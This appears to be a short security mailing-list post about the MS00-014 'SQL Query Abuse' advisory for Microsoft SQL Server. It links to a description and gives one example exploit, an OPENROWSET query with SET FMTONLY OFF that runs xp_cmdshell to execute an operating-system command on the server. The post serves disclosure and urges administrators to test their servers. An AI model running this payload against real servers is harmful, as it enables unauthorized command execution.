Due to the apparent blackout of information about the "SQL Query Abuse" advisory http://www.microsoft.com/technet/security/bulletin/ms00-014.asp I wanted to point any interested parties to an English description of the vulnerability by Sven Hammesfahr. The detailed description is on his website at http://itrain.de/sql/knowhow/security/openrowsete.htm Also, the "little trick" he refers to is in my opinion the addition of SET FMTONLY OFF before the execute statement to keep the query from returning metadata only. An example exploit would be: SELECT * FROM OPENROWSET('SQLOLEDB','Trusted_Connection=Yes;Data Source=myserver','SET FMTONLY OFF execute master..xp_cmdshell "dir c:\"') Test your servers ASAP to keep from becoming a statistic... ----------------------------------------- Chip Andrews, MCSE+I, MCSD http://www.sqlsecurity.com http://www.eexams.com ------------------------------------------
